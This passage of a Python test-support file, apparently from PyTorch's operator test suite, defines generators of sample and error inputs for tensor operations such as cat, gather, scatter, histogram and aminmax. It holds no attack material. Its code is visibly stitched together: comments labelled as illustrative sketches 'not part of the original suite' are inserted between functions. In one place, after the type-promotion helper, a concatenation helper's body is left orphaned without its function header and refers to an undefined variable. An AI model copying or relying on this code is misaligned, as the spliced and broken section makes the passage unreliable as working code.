    test_cases: Tuple[tuple] = (((3,), (1, 2, 1), (1, 1), (5, 1, 1),),)

    samples: List[SampleInput] = []
    for shape, *other_shapes in test_cases:
        samples.append(SampleInput(make_arg(shape), args=tuple(make_arg(s) for s in other_shapes)))

    return samples

def reference_inputs_broadcast_tensors(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_broadcast_tensors(op, device, dtype, requires_grad, **kwargs)

    m = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    n = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad, noncontiguous=True)

    cases = (
        ((), (1, 1), (1, 1, 7, 1), (3, 1, 1)),
        ((3, 5, 6), (1, 3, 5, 6), (1, 1, 1, 1, 6), (8, 3, 5, 6))
    )

    for a, b, c, d in cases:
        yield SampleInput(m(a), args=(m(b), m(c), m(d)))
        yield SampleInput(n(a), args=(n(b), n(c), n(d)))

def sample_inputs_block_diag(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    test_cases: Tuple[tuple] = (
        ((1, S), (2, S), (3, S),),
        ((S, 1), (S, 2), (S, 3),),
        ((1,), (2,), (3,),),
        ((2, S), (S,))
    )

    samples: List[SampleInput] = []
    for shape, *other_shapes in test_cases:
        samples.append(SampleInput(make_arg(shape), args=tuple(make_arg(s) for s in other_shapes)))
        # We also want to test mixed complex-non-complex inputs to block_diag
        if dtype == torch.complex32 or dtype == torch.complex64:
            non_complex_dtype = torch.float32 if dtype == torch.complex32 else torch.float64
            make_arg_non_complex = partial(make_tensor, dtype=non_complex_dtype, device=device, requires_grad=requires_grad)
            samples.append(SampleInput(make_arg_non_complex(shape), args=tuple(make_arg(s) for s in other_shapes)))

    return samples

def sample_inputs_cdist(op_info, device, dtype, requires_grad, **kwargs):
    small_S = 2
    test_cases = (
        ((S, S, 2), (S, S + 1, 2)),
        ((S, S), (S, S)),
        ((S, S, S), (S, S, S)),
        ((3, 5), (3, 5)),
        ((2, 3, 5), (2, 3, 5)),
        ((1, 2, 3), (1, 2, 3)),
        ((1, 1), (S, 1)),
        ((0, 5), (4, 5)),
        ((4, 5), (0, 5)),
        ((0, 4, 5), (3, 5)),
        ((4, 5), (0, 3, 5)),
        ((0, 4, 5), (1, 3, 5)),
        ((1, 4, 5), (0, 3, 5)),
        # Using S here would make this one test take 9s
        ((small_S, small_S, small_S + 1, 2), (small_S, small_S, small_S + 2, 2)),
        ((small_S, 1, 1, small_S), (1, small_S, small_S)),
        ((1, 1, small_S), (small_S, 1, small_S, small_S)),
    )

    samples = []
    for cm in ['use_mm_for_euclid_dist', 'donot_use_mm_for_euclid_dist']:
        # FIXME add an override for JIT and revert 0. back to 0
        # since it's accepted by eager
        for p in [0., 1., 2., 3., 0.5, 1.5, 2.5, float("inf")]:
            for t1_size, t2_size in test_cases:
                # The args should never be non-contiguous as this is not supported in the backward
                samples.append(SampleInput(
                    make_tensor(t1_size, dtype=dtype, device=device, requires_grad=requires_grad),
                    args=(make_tensor(t2_size, dtype=dtype, device=device, requires_grad=requires_grad), p, cm)))

    return samples

def sample_inputs_fill_(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype,
                       low=None, high=None, requires_grad=requires_grad)

    cases = (((S, S, S), (1,)),
             ((), (1,)),
             ((S, S, S), (make_arg(()),)))

    for shape, args in cases:
        yield SampleInput(make_arg(shape), args=args)

def _fill_np(a, value):
    a = a.copy()
    a.fill(value)
    return a

def _fill_aten(a, value):
    t = a * False
    with torch.no_grad():
        t.fill_(value)
    return t

def _fill_sample_kwargs(device, dtype, input):
    if dtype is torch.bool:
        value = True
    else:
        value = 3

    return ({'value': value}, {'value': value})

def sample_inputs_comparison_ops(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs)

    # Adds a sample input where both tensors have the same values
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    lhs = make_arg((S, S))
    yield SampleInput(lhs, args=(lhs.clone(),))

def sample_inputs_stack(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # shape x number of tensors
    cases = (
        ((3, 4), 1),
        ((1, 2, 1, 4), 3),
        ((0, 1, 0), 2),)

    for shape, num_tensors in cases:
        tensors = []
        for _ in range(num_tensors):
            tensors.append(make_arg(shape))
        for dim in range(-1, len(shape) - 1):
            yield SampleInput(tensors, args=(dim,))

def sample_inputs_cat_concat(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    cases: Tuple[tuple, tuple, dict] = (  # type: ignore[assignment]
        ((S, S), (S, S), {'dim': -1}),
        ((S, S), (S, S), {'dim': 1}),
        ((M, S), (S, S), {'dim': 0}),  # different shapes
        ((1, 2, 3), (1, 2, 3), {'dim': -2}),
        ((0,), (0,), {'dim': 0}),  # empty tensor
        ((0, S), (S, S), {'dim': 0}),
        ((1,), (1,), {})  # dim not passed, fallback to default
    )

    for input_shape1, input_shape2, kwargs in cases:
        yield SampleInput([make_arg(input_shape1), make_arg(input_shape2)], kwargs=kwargs)

def reference_inputs_cat(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_cat_concat(op, device, dtype, requires_grad, **kwargs)

    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Noncontiguous type promoting tensors
    a = make_arg((3, 4, 2))
    b = make_arg((3, 2, 2), noncontiguous=True, dtype=torch.double)
    c = make_arg((3, 3, 2), dtype=torch.float16).permute(1, 0, 2)

    yield SampleInput((a, b, c), kwargs={'dim': 1})

    # Special 1D tensor with dim length of 0 case
    a = make_arg((0,))
    b = make_arg((3, 2, 2))

    yield SampleInput((a, b, a))
    yield SampleInput((a, a, a))

def _elementwise_type_promo_np(*args, type_promotion_kind):
    def _maybe_torch(x):
        if isinstance(x, np.ndarray):
            return torch.from_numpy(x)
        return x

    flattened = tree_flatten(args)[0]
    transformed = tuple(_maybe_torch(a) for a in flattened)
    result_dtype, _ = prims.utils.elementwise_dtypes(
        *transformed,
        type_promotion_kind=type_promotion_kind)
    return torch_to_numpy_dtype_dict[result_dtype]
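# Illustrative sketch (assumption: not part of the original suite): under the
# DEFAULT promotion kind, mixing fp16 and fp32 operands is expected to promote
# to fp32, which _elementwise_type_promo_np reports as a numpy dtype.
def _example_elementwise_type_promo():
    a = np.ones(2, dtype=np.float16)
    b = np.ones(2, dtype=np.float32)
    promoted = _elementwise_type_promo_np(
        a, b, type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.DEFAULT)
    return promoted == np.float32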
    inputs = tuple(a for a in input_seq if not (a.ndim == 1 and a.size == 0))

    if len(inputs) == 0:
        np_dtype = _elementwise_type_promo_np(
            input_seq,
            type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.NO_OPMATH)
        return np.empty(0, dtype=np_dtype)

    return np.concatenate(inputs, axis=dim)

def _floor_divide_np(a, b):
    dtype = _elementwise_type_promo_np(
        a, b,
        type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.DEFAULT)
    if isinstance(a, np.ndarray):
        a = a.astype(dtype)
    if isinstance(b, np.ndarray):
        b = b.astype(dtype)
    return np.floor_divide(a, b)

def sample_inputs_hstack_dstack_vstack(op_info, device, dtype, requires_grad, **kwargs):
    tensors = [
        make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),
        make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),
        make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),
    ]

    return (SampleInput(tensors),)

def sample_inputs_gather(op_info, device, dtype, requires_grad, **kwargs):
    return (
        SampleInput(
            make_tensor((M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(0, gather_variable((S, S), 1, M, True, device=device))),
        SampleInput(
            make_tensor((M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(1, gather_variable((M, S // 2), 0, S, True, device=device))),
        SampleInput(
            make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(0, torch.tensor([0], dtype=torch.int64, device=device))),
        # Empty index tensor case, see: https://github.com/pytorch/pytorch/pull/65006
        SampleInput(
            make_tensor((S,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(0, torch.tensor([], dtype=torch.uint8, device=device))),
        SampleInput(
            make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(0, torch.tensor(0, dtype=torch.int64, device=device))),
    )

def _fill_indices(idx, dim, dim_size, elems_per_row, m, n, o):
    for i in range(1 if dim == 0 else m):
        for j in range(1 if dim == 1 else n):
            for k in range(1 if dim == 2 else o):
                ii = [i, j, k]
                ii[dim] = slice(0, idx.size(dim) + 1)
                idx[tuple(ii)] = torch.randperm(dim_size)[0:elems_per_row]

def error_inputs_gather(op_info, device, **kwargs):
    # src is [1, 2]
    #        [3, 4]
    src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32)

    # idx is [0, 0]
    #        [1, 0]
    idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long)

    # Index should be smaller than self except on dimension 1
    bad_src = make_tensor((1, 1), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(bad_src, args=(1, idx,)),
                     error_regex="Size does not match at dimension 0")

    # Index must have long dtype
    bad_idx = idx.to(torch.int32)
    yield ErrorInput(SampleInput(src, args=(1, bad_idx)),
                     error_regex="Expected dtype int64 for index")

    # TODO: FIXME
    # out.dtype must match src.dtype
    # Creates new src & idx since SampleInputs can't share tensors
    src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long)
    out = torch.empty((2, 2), device=device, dtype=torch.float64)
    yield ErrorInput(SampleInput(src, args=(1, idx), kwargs={'out': out}),
                     error_regex="Expected out tensor to have dtype")

    # src and index tensors must have the same # of dimensions
    # idx too few dimensions
    src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32)
    idx = torch.tensor((0, 0), device=device, dtype=torch.long)
    yield ErrorInput(SampleInput(src, args=(1, idx)),
                     error_regex="Index tensor must have the same number of dimensions")

    # src too few dimensions
    src = torch.tensor((1, 2), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long)
    yield ErrorInput(SampleInput(src, args=(0, idx)),
                     error_regex="Index tensor must have the same number of dimensions")

    # index out of bounds
    # NOTE: this ErrorInput is guarded because bounds checking does not occur on CUDA devices
    if torch.device(device).type == 'cpu':
        src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32)
        idx = torch.tensor(((0, 23), (1, 0)), device=device, dtype=torch.long)
        yield ErrorInput(SampleInput(src, args=(1, idx,)),
                         error_regex="index 23 is out of bounds for dimension")

    x = torch.rand((1,), device=device).expand((3,))
    src = torch.rand((6,), device=device)
    ind = torch.tensor([2, 1, 0], device=device, dtype=torch.int64)

    yield ErrorInput(SampleInput(src, args=(0, ind,), kwargs=dict(out=x)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(src, args=(0, ind,), kwargs=dict(out=src)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(ind.clone(), args=(0, ind[1:],), kwargs=dict(out=ind[:1])),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

def error_inputs_take(op_info, device, **kwargs):
    x = torch.rand((1,), device=device).expand((3,))
    src = torch.rand((6,), device=device)
    ind = torch.tensor([2, 1, 0], device=device, dtype=torch.int64)

    yield ErrorInput(SampleInput(src, args=(ind,), kwargs=dict(out=x)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(src, args=(ind,), kwargs=dict(out=src)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(ind.clone(), args=(ind[1:],), kwargs=dict(out=ind[:-1])),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')
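# Illustrative sketch (assumption: not part of the original suite): ErrorInput
# cases pair a SampleInput with the exception type/regex the op is expected to
# raise. Attribute names below (sample_input, error_type, error_regex) are
# assumed from the ErrorInput constructor calls above; a real test would also
# assert that an error is raised at all.
def _example_check_gather_error_inputs(device='cpu'):
    import re
    for ei in error_inputs_gather(None, device):
        si = ei.sample_input
        try:
            torch.gather(si.input, *si.args, **si.kwargs)
        except ei.error_type as e:
            assert re.search(ei.error_regex, str(e))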
# Error inputs for scatter
def error_inputs_scatter_and_scatter_add(op_info, device, **kwargs):
    # Error when self.dtype != src.dtype (and src is not a scalar)
    src = make_tensor((2, 5), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.long)
    dst = torch.zeros((3, 5), device=device, dtype=torch.double)
    yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                     error_regex="Expected self.dtype to be equal to src.dtype")

    # Index dtype must be long
    src = make_tensor((2, 5), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.int32)
    dst = torch.zeros((3, 5), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                     error_regex="Expected dtype int64 for index")

    # Index and destination must have the same number of dimensions
    src = make_tensor((2, 5), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.long)
    dst = torch.zeros((3, 5, 3), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                     error_regex="Index tensor must have the same number of dimensions as self tensor")

    # Index and src must have the same number of dimensions when src is not a scalar
    src = make_tensor((2, 5, 2), device=device, dtype=torch.float32)
    idx = torch.tensor(((34, 1), (1, 2)), device=device, dtype=torch.long)
    dst = torch.zeros((3, 5), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                     error_regex="Index tensor must have the same number of dimensions as src tensor")

    # Index out of bounds
    # NOTE: this ErrorInput is guarded because bounds checking does not occur on CUDA devices
    if torch.device(device).type == 'cpu':
        src = make_tensor((2, 5), device=device, dtype=torch.float32)
        idx = torch.tensor(((34, 1), (1, 2)), device=device, dtype=torch.long)
        dst = torch.zeros((3, 5), device=device, dtype=torch.float32)
        yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                         error_regex="index 34 is out of bounds for dimension 0 with size 3")

def error_inputs_renorm(op_info, device, **kwargs):
    zero_d = torch.randn((), device=device)
    yield ErrorInput(SampleInput(zero_d, args=(0.5, 0, 1.0)), error_type=RuntimeError,
                     error_regex="needs at least 2 dimensions, got 0 dimensions")

def error_inputs_lstsq(op_info, device, **kwargs):
    zero_d = torch.randn((), device=device)
    yield ErrorInput(SampleInput(zero_d, args=(zero_d)), error_type=TypeError,
                     error_regex="iteration over a 0-d tensor")

def error_inputs_eig(op_info, device, **kwargs):
    zero_d = torch.randn((), device=device)

    yield ErrorInput(SampleInput(zero_d, args=(False,)), error_type=RuntimeError,
                     error_regex="input should be 2 dimensional")

    yield ErrorInput(SampleInput(zero_d, args=(True,)), error_type=RuntimeError,
                     error_regex="input should be 2 dimensional")

def error_inputs_ormqr(op_info, device, **kwargs):
    # this is only implemented on cpu
    if (torch.device(device).type == 'cpu'):
        zero_d = torch.randn((), device=device)
        yield ErrorInput(SampleInput(zero_d, args=(zero_d, zero_d)), error_type=RuntimeError,
                         error_regex="input must have at least 2 dimensions")

def error_inputs_diag(op_info, device, **kwargs):
    zero_d = torch.randn((), device=device)
    yield ErrorInput(SampleInput(zero_d, args=(zero_d)), error_type=TypeError,
                     error_regex="iteration over a 0-d tensor")

def error_inputs_embedding(op_info, device, **kwargs):
    indices = torch.rand(2, 2, device=device).long()
    weights = [
        torch.tensor(1.0, device=device),
        torch.tensor(1.0, device=device).reshape(1, 1, 1),
    ]

    for weight in weights:
        yield ErrorInput(SampleInput(weight, args=(indices,)), error_type=RuntimeError,
                         error_regex="'weight' must be 2-D")

def error_inputs_t(op_info, device, **kwargs):
    yield ErrorInput(
        SampleInput(torch.randn(2, 3, 4, 5, device=device)),
        error_type=RuntimeError,
        error_regex="expects a tensor with <= 2",
    )
def error_inputs_multinomial(op_info, device, **kwargs):
    x = torch.empty(1, 2, 3, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(2,)), error_type=RuntimeError,
                     error_regex="prob_dist must be 1 or 2 dim")

    x = torch.empty(1, 2, dtype=torch.long, device=device)
    yield ErrorInput(SampleInput(x, args=(2,)), error_type=RuntimeError,
                     error_regex="multinomial only supports floating-point dtypes for input")

    x = torch.empty(1, 2, dtype=torch.double, device=device)
    y = torch.empty(1, 2, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(2,), kwargs=dict(out=y)), error_type=RuntimeError,
                     error_regex="multinomial expects Long tensor out")

    x = torch.empty(2, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(0,)), error_type=RuntimeError,
                     error_regex="cannot sample n_sample <= 0 samples")

    x = torch.empty(2, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(-1,)), error_type=RuntimeError,
                     error_regex="cannot sample n_sample <= 0 samples")

    x = torch.empty(2, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(3, False,)), error_type=RuntimeError,
                     error_regex="cannot sample n_sample > prob_dist")

    x = torch.empty(16777217, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(3,)), error_type=RuntimeError,
                     error_regex="number of categories cannot exceed")

def error_inputs_gradient(op_info, device, **kwargs):
    for dtype in [torch.long, torch.float32, torch.complex64]:
        t = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]], device=device, dtype=dtype)

        dim = (1, 0)
        spacing = [0.1]
        yield ErrorInput(SampleInput(t, kwargs=dict(spacing=spacing, dim=dim, edge_order=1)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient expected spacing to be unspecified, a scalar ')

        yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=3)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient only supports edge_order=1 and edge_order=2.')

        dim = (1, 1)
        spacing = 0.1
        yield ErrorInput(SampleInput(t, kwargs=dict(spacing=spacing, dim=dim, edge_order=1)),
                         error_type=RuntimeError,
                         error_regex='dim 1 appears multiple times in the list of dims')

        dim = (0, 1)
        coordinates = [torch.tensor([1, 2, 4], device='cpu'), torch.tensor([1, 2, 4], device='meta')]
        yield ErrorInput(SampleInput(t, kwargs=dict(spacing=coordinates, dim=dim, edge_order=1)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient expected each tensor to be on the same device,')

        yield ErrorInput(SampleInput(t, kwargs=dict(dim=3)),
                         error_type=IndexError, error_regex='')

        t = torch.tensor([[1], [2], [3]])
        yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=1)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient expected each dimension size to be at least')

        t = torch.tensor([[1, 2], [3, 4]])
        yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=2)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient expected each dimension size to be at least')

def error_inputs_masked_select(op_info, device, **kwargs):
    x = torch.rand((1,), device=device).expand((3,))
    y = torch.rand((6,), device=device)
    mask = torch.tensor([True, False, True, True, False, False], device=device)

    yield ErrorInput(SampleInput(y, args=(mask,), kwargs=dict(out=x)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(y, args=(mask,), kwargs=dict(out=y)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(mask.clone(), args=(mask,), kwargs=dict(out=mask)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

def error_inputs_index_select(op_info, device, **kwargs):
    x = torch.rand((1, 6), device=device).expand((2, 6))
    y = torch.rand((3, 6), device=device)
    ind = torch.tensor([0, 1], dtype=torch.int64, device=device)

    yield ErrorInput(SampleInput(y, args=(1, ind,), kwargs=dict(out=x)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

def error_inputs_logcumsumexp(op_info, device, **kwargs):
    dim = 3
    srcs = [torch.randn(5, 2, device=device), torch.randn(0, 2, device=device)]
    for src in srcs:
        yield ErrorInput(SampleInput(src, args=(dim,)),
                         error_type=IndexError,
                         error_regex='Dimension out of range')
def sample_inputs_take_along_dim(op_info, device, dtype, requires_grad, **kwargs):
    return (SampleInput(make_tensor((S, S), dtype=dtype, device=device,
                                    low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((S, S), 1, S, True, device=device), 0)),

            # `indices` broadcast
            SampleInput(make_tensor((S, S), dtype=dtype, device=device,
                                    low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((1, S // 2), 0, S, True, device=device), 1)),

            # `self` broadcast
            SampleInput(make_tensor((1, S), dtype=dtype, device=device,
                                    low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((S, S // 2), 0, S, True, device=device), 1)),

            # without `dim` arg
            SampleInput(make_tensor((S, S), dtype=dtype, device=device,
                                    low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((S, S // 2), 0, S, True, device=device), )),
            SampleInput(make_tensor((S, S), dtype=dtype, device=device,
                                    low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((S, S // 2), 0, S, True, device=device),)),
            )

def error_inputs_aminmax_amax_amin(op_info, device, **kwargs):
    # Error Inputs for tensors with a zero-sized dimension, when 'dim' arg is not provided.
    shape = (S, 0, S)
    err_msg_amax_amin = "reduction"
    err_msg_aminmax = "cannot compute aminmax over an empty dimension as the operation has no identity"
    if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']:
        yield ErrorInput(SampleInput(torch.rand(shape, device=device)), error_regex=err_msg_amax_amin)
    elif op_info.name in ['aminmax']:
        yield ErrorInput(SampleInput(torch.rand(shape, device=device)), error_regex=err_msg_aminmax)

    # Error Inputs for tensors with more than 64 dimensions
    sizes = [1] * 65
    err_msg1 = "only tensors with up to 64 dims are supported"
    yield ErrorInput(SampleInput(torch.randn(sizes, device=device), kwargs={'dim': -1}),
                     error_regex=err_msg1)
    yield ErrorInput(SampleInput(torch.randn(sizes, device=device), kwargs={'dim': 64}),
                     error_regex=err_msg1)

    # Error Inputs for repeated 'dim'
    if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']:
        dims = [(0, 0), (0, -4)]
        err_msg2 = "in the list of dims"
        x = torch.randn(S, S, S, S, device=device)
        for dim in dims:
            yield ErrorInput(SampleInput(x, kwargs={'dim': dim}), error_regex=err_msg2)

    # Error Input for illegal dtype
    input5 = torch.randn(L, L, dtype=torch.float32, device=device)
    max_values = torch.empty(L, dtype=torch.float32, device=device)
    min_values = torch.empty(L, dtype=torch.double, device=device)
    illegal_values = torch.empty(L, dtype=torch.int, device=device)

    err_msg_amax_amin2 = "Expected the dtype for input and out to match"
    err_msg_aminmax2 = "Expected out tensor to have dtype float, but got double instead"

    if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']:
        yield ErrorInput(SampleInput(input5, kwargs={'dim': 0, 'out': illegal_values}),
                         error_regex=err_msg_amax_amin2)
    elif op_info.name in ['aminmax']:
        yield ErrorInput(SampleInput(input5, kwargs={'dim': 0, 'out': (max_values, min_values)}),
                         error_regex=err_msg_aminmax2)

    # Error Inputs for functions expected to raise an error when a zero-sized dimension
    # is specified as the reduction dim
    err_msg3 = "reduction"
    # FIXME: eager and ref impl throw different types of errors
    error_type = IndexError if 'refs' not in op_info.name else RuntimeError
    yield ErrorInput(SampleInput(torch.rand(shape, device=device), kwargs={'dim': 1}),
                     error_type=error_type, error_regex=err_msg3)

def sample_inputs_aminmax(op_info, device, dtype, requires_grad, **kwargs):
    test_cases: Tuple[tuple, dict] = (  # type: ignore[assignment]
        ((S, S, S), {}),
        ((S, S, S), {'dim': 1}),
        ((S, S, S), {'dim': 1, 'keepdim': True}),
        ((), {'dim': 0}),
        ((), {}),
        ((), {'dim': 0, 'keepdim': True}),
    )

    samples: List[SampleInput] = []
    for shape, kwargs in test_cases:
        samples.append(SampleInput(
            make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad),
            kwargs=kwargs))

    return samples
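# Illustrative sketch (assumption: not part of the original suite): the aminmax
# samples map directly onto torch.aminmax, which returns a (min, max) pair.
def _example_consume_aminmax_samples():
    pairs = []
    for sample in sample_inputs_aminmax(None, 'cpu', torch.float32, requires_grad=False):
        pairs.append(torch.aminmax(sample.input, **sample.kwargs))
    return pairs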
def sample_inputs_diff(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    test_cases = (
        ((1,), 0, None, None),
        ((S,), 0, None, None),
        ((S, 1), 0, None, None),
        ((S, 1), 1, None, None),
        ((S, S), 0, None, None),
        ((S, S), 1, None, None),
        ((S, S), 0, (1, S), (2, S)),
        ((S, S), 0, None, (2, S)),
        ((S, S, S), 1, None, None),
        ((S, S, S), 2, None, None),
        ((S, S, S), 1, (S, 1, S), (S, 1, S)),
        ((S, S, S), 2, (S, S, 1), (S, S, 1)),
        ((S, S, S), 2, (S, S, S), (S, S, S)),)

    sample_inputs = []
    for size, dim, size_prepend, size_append in test_cases:
        prepend_size = 0 if (size_prepend is None) else size_prepend[dim]
        append_size = 0 if (size_append is None) else size_append[dim]
        dim_size = size[dim] + prepend_size + append_size
        for n in range(dim_size):
            input_tensor = make_arg(size)
            prepend = make_arg(size_prepend) if size_prepend else None
            append = make_arg(size_append) if size_append else None
            sample_inputs.append(SampleInput(input_tensor, args=(n, dim, prepend, append,)))

    # add some samples with n > dim_size
    sample_inputs.append(SampleInput(make_arg((S, S, S)), args=(S + 1, 1,)))
    sample_inputs.append(SampleInput(make_arg((S, S, S)),
                                     args=(S * 3 + 2, 2, make_arg((S, S, S)), make_arg((S, S, S)),)))

    return sample_inputs

def sample_inputs_histogram(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S))

    sample_inputs = []
    for size, bin_ct, weighted, density in product(sizes, range(1, 5), [False, True], [False, True]):
        input_tensor = make_arg(size)
        weight_tensor = make_arg(size) if weighted else None

        sample_inputs.append(SampleInput(input_tensor, args=(bin_ct,),
                                         kwargs=dict(weight=weight_tensor, density=density)))

        bins_tensor = make_arg((bin_ct + 1,))
        sample_inputs.append(SampleInput(input_tensor, args=(bins_tensor,),
                                         kwargs=dict(weight=weight_tensor, density=density)))

    return sample_inputs

def sample_inputs_histogramdd(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((S, S), (S, S, S), (S, 1, S), (S, 0, S))
    bin_ct_patterns = ((1, 1, 1, 1, 1), (2, 3, 2, 3, 2), (3, 2, 3, 2, 3))

    sample_inputs = []
    for size, bin_ct_pattern, weighted, density in product(sizes, bin_ct_patterns, [False, True], [False, True]):
        input_tensor = make_arg(size)
        bin_ct = bin_ct_pattern[:size[-1]]
        weight_tensor = make_arg(size[:-1]) if weighted else None

        sample_inputs.append(SampleInput(input_tensor, args=(bin_ct,),
                                         kwargs=dict(weight=weight_tensor, density=density)))

        bins_tensor = [make_arg(ct + 1) for ct in bin_ct]
        sample_inputs.append(SampleInput(input_tensor, args=(bins_tensor,),
                                         kwargs=dict(weight=weight_tensor, density=density)))

    return sample_inputs

def sample_inputs_histc(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S))

    sample_inputs = []
    for size, min, max in product(sizes, [0, -10], [0, 10]):
        # construct sample input omitting bins arg
        sample_inputs.append(SampleInput(make_arg(size),
                                         kwargs=dict(min=min, max=max)))

        # construct sample inputs with a few different bins values
        for bins in [1, 3, 10]:
            sample_inputs.append(SampleInput(make_arg(size),
                                             kwargs=dict(bins=bins, min=min, max=max)))

    return sample_inputs
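# Illustrative sketch (assumption: not part of the original suite): histc samples
# carry bins/min/max as kwargs, so replaying one is a direct keyword call. The
# numel() guard is an assumption added here to skip empty inputs.
def _example_consume_histc_samples():
    hists = []
    for sample in sample_inputs_histc(None, 'cpu', torch.float32, requires_grad=False):
        if sample.input.numel() > 0:
            hists.append(torch.histc(sample.input, **sample.kwargs))
    return hists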
def sample_inputs_bincount(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sample_inputs = []
    for size, weighted in product((S, M), [False, True]):
        input_tensor = torch.randint(0, size, (size,), dtype=dtype, device=device)
        weight_tensor = make_arg((size,)) if weighted else None

        max_val = int(input_tensor.max().item())

        for minlength in [0, max_val // 2, max_val, 2 * max_val]:
            sample_inputs.append(SampleInput(input_tensor,
                                             kwargs=dict(weights=weight_tensor, minlength=minlength)))

    return sample_inputs

def sample_inputs_bucketize(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S))

    sample_inputs = []
    for size, out_int32, right in product(sizes, [False, True], [False, True]):
        input_tensor = make_arg(size)
        boundaries = make_arg((S,)).msort()

